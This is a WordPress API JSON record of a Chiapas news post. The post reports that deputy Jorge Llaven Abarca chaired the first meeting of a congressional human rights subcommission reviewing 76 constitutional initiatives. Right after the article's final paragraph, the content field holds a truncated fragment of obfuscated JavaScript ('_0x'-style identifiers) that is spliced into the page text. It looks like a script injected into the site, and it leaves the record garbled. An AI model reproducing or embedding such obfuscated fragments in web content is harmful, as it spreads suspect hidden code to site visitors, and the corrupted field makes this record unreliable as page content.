{"id":452,"date":"2022-03-10T21:17:24","date_gmt":"2022-03-10T21:17:24","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=452"},"modified":"2022-03-10T21:17:25","modified_gmt":"2022-03-10T21:17:25","slug":"encabeza-llaven-abarca-reunion-de-trabajo-de-la-subcomision-de-derechos-humanos-y-sus-garantias","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=452","title":{"rendered":"Encabeza Llaven Abarca reuni\u00f3n de trabajo de la Subcomisi\u00f3n de Derechos Humanos y sus Garant\u00edas"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"960\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/03\/IMG-20220310-WA0132-1024x960.jpg\" alt=\"\" class=\"wp-image-453\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/03\/IMG-20220310-WA0132-1024x960.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/03\/IMG-20220310-WA0132-300x281.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/03\/IMG-20220310-WA0132-768x720.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/03\/IMG-20220310-WA0132.jpg 1200w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>10 de Marzo del 2022. Tuxtla Guti\u00e9rrez, Chiapas.- El diputado federal Jorge Llaven Abarca encabez\u00f3 este jueves la Primera Reuni\u00f3n de Trabajo de la Subcomisi\u00f3n de Derechos Humanos y sus Garant\u00edas de la Comisi\u00f3n de Puntos Constitucionales, la cual preside; destacando que el compromiso de este grupo de trabajo es analizar, discutir y en su caso aprobar dict\u00e1menes que garanticen y protejan los derechos fundamentales de la ciudadan\u00eda.En entrevista, el legislador chiapaneco mencion\u00f3 que en su calidad de presidente de dicha subcomisi\u00f3n, tiene la responsabilidad de coordinar y dialogar con cada uno de los integrantes de los grupos parlamentarios para llegar a los mejores acuerdos que hagan frente a los retos y desaf\u00edos de la sociedad.\u201cAlrededor de 220 iniciativas de reforma constitucional han sido turnadas a la Comisi\u00f3n de Puntos Constitucionales, de las cuales 76 ser\u00e1n analizadas y discutidas en la Subcomisi\u00f3n de Derechos Humanos y sus Garant\u00edas, es un gran compromiso estar al frente de este grupo de trabajo, donde habremos de analizar y en su caso aprobar dict\u00e1menes en materia de igualdad y no discriminaci\u00f3n; derechos de ejercicio individual, social y colectivo; garant\u00edas procesales-penales; protecci\u00f3n jurisdiccional; y protecci\u00f3n no jurisdiccional; y otros organismos garantes de derechos fundamentales\u201d, declar\u00f3.Finalmente, Llaven Abarca reiter\u00f3 su serio compromiso de levantar la voz en la C\u00e1mara de Diputados para defender los verdaderos intereses de la ciudadan\u00eda, siempre privilegiando a los que menos tienen.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>10 de Marzo del 2022. Tuxtla Guti\u00e9rrez, Chiapas.- El diputado federal Jorge Llaven Abarca encabez\u00f3 este jueves la Primera Reuni\u00f3n de Trabajo de la Subcomisi\u00f3n de Derechos Humanos y sus Garant\u00edas de la Comisi\u00f3n de Puntos Constitucionales, la cual preside; destacando que el compromiso de este grupo de trabajo es analizar, discutir y en su &hellip;<\/p>\n","protected":false},"author":2,"featured_media":453,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[7],"tags":[],"class_list":["post-452","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-chiapas"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/452","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=452"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/452\/revisions"}],"predecessor-version":[{"id":454,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/452\/revisions\/454"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/453"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=452"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=452"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=452"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}